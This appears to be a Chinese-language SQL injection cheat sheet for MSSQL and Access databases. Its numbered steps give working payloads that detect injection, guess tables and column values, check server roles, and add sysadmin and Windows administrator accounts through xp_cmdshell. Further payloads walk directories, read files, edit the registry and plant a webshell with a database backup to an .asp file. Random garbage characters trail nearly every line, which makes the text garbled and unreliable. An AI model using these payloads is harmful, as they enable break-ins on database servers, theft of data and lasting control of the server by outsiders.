1.判断是否有注入;and 1=1 ;and 1=2 {��)4�Vv`n
2.初步判断是否是mssql ;and user>0 wS``Q8K+dM
W�n0r[h5t�
3.注入参数是字符'and [查询条件] and ''=' *VHB�TO9�
4T�wU0N�+>
4.搜索时没过滤参数的'and [查询条件] and '%25'=' rJ\A)O+Mq(
ua|qL�!�L+
5.判断数据库系统 h,�FP,w;G�
oq8~P�T�w
;and (select count(*) from sysobjects)>0 mssql 6Wc��e�DY�
�<'���P|�g
;and (select count(*) from msysobjects)>0 access 1G�.+)�*:3
Q�Aygr4\X^
2-j�|�q6m5
k_P�`t[YZV
6.猜数据库 ;and (select Count(*) from [数据库名])>0 B��
susXW$
PO&�x�i�9_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
`c�:'�il?
�)Bb :tz+�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 VZA��dc*�X
"M�oV*U2s,
9.(1)猜字段的ascii值(access) "5�{Yn!�-:
g��v�oK��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <R��GRv�v�
hXz�"}X �n
(2)猜字段的ascii值(mssql) ��9?�,n�+�
$X�yGC�n��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }Lb];hww1�
W�v=L_E�_
10.测试权限结构(mssql) �,Yi =s;�E
I=(O,*+P�Q
aj�(M{gFq~
D�cus-,u�~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Y]�� P}7GZ
�/3KEX{'@U
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +��%��U@�
JS�G�Ul4N
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �De>pIN;B>
�\�R79��^�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- p-*BB_�J"
A8Jbl^7E+
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- fi b��R�:8
HowlJ[�km%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- tCc}}�2bC&
1�"v;w!u�h
;and 1=(select IS_MEMBER('db_owner'));-- y:2o-SJ��n
jDX�mre?��
(/@o7&>*50
+S/8{2%?DG
11.添加mssql和系统的帐户 ?�7G[`@^Y
p%3'�;7W\
;exec master.dbo.sp_addlogin username;-- �#(�
�
k�T
;exec master.dbo.sp_password null,username,password;-- b]|�7{y�MV
�K�pwUp5K
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ?�[m5|ty#
L�l�k���`
;exec master.dbo.xp_cmdshell 'net user username password 0
?�2#�S�M
)$th${pd#v
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- mY`b|cS3p$
�W]M[5�p]*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @&EP&
�$�*
$7B��D~U��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- k?S-pe�yRO
58v5Z$%--�
�u[d�I8�1`
Q�|�xP��m:
12.(1)遍历目录 u��"|.]�r�
0�h�N�c#x6
;create table dirs(paths varchar(100), id int) �.D�x�]wv�
||!k 3�t#<
;insert dirs exec master.dbo.xp_dirtree 'c:\' G 8NSBa�Ze
X;6X
K$"��
;and (select top 1 paths from dirs)>0 )�L���#I#%
�J�T_#>',�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) P� AKh v.7
}�>�0UaK��
\�lY26��'�
w�6wXe_N+M
(2)遍历目录 �OKf/�[hyu
;$��%�+TN�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
Pt1Htt:BE
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 aq��yXxJS8
P,�����>#�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Wg$MKc9Vy[
pkx�W19h*0
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 #D>8\#53V/
90ORx\Oe�o
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �4Y�n*q~f
q-!�m|<�Z�
dv�Xu?F5�5
#MBY�a&Tw7
13.mssql中的存储过程 #[i({1`^L
��xkn�P
`T
xp_regenumvalues 注册表根键, 子键 �=�E,*8O�]
��s�X**'cH
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 W5yqnjK
$4
Fh�?q;oEj
xp_regread 根键,子键,键值名 ;X�TP^W!6f
Ybok��[5��
;exec xp_regread 6��~2�!Z�U
$�Z;0/�\r%
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 E�L�+}ab2S
M@gm�.)d��
xp_regwrite 根键,子键, 值名, 值类型, 值 �z�{%���G�
�8<g5.$xyz
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �#cmj?y(�)
( �E0be�.�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �k@wxN!w�;
y\@XW�*�_?
xp_regdeletevalue 根键,子键,值名 N�:d" �{k�
f��-23.]`v
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 4�~Z\tP|Q.
qvab��>U`�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ���\
(X~Z
Z-�/� �E$j
43(+3$V�M7
�7d9%L}+q�
14.mssql的backup创建webshell Put�+<o
�<
:Tjo+vw7$H
use model ��xl<Cstr
>V�g<J~[�g
create table cmd(str image); ^��W��Vr@6
|#MA�?oz3T
insert into cmd(str) values (''); q'1���r�SK
�E�mH2 Dbw
backup database model to disk='c:\l.asp'; u�n��..UU4
�W/&cnp�\
�H(""�So7L
.=K@M"5��&
15.mssql内置函数 (A��?e}M^}
�T$��RZRZo
;and (select @@version)>0 获得Windows的版本号 .��ipYZg'V
�fc&�4e:Ve
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 5$jKw\FF=�
&|�',o ?'F
;and (select user_name())>0 爆当前系统的连接用户 %� +eZ U)N
cl{�;%4$�9
;and (select db_name())>0 得到当前连接的数据库 �}b~ZpUL!�
�+=�:CW'B5
�a��|�6�6[
3g} ]�nj:N
16.简洁的webshell :PjHs�Np;^
y=q\1~]��Z
use model �6{1c
��S
�nC2A&n�&>
create table cmd(str image); �e�yUo67'7
�I�F@)L>-%
insert into cmd(str) values (''); Rb\\6��BU0
(u��R�AK
backup database model to disk='g:\wwwtest\l.asp';
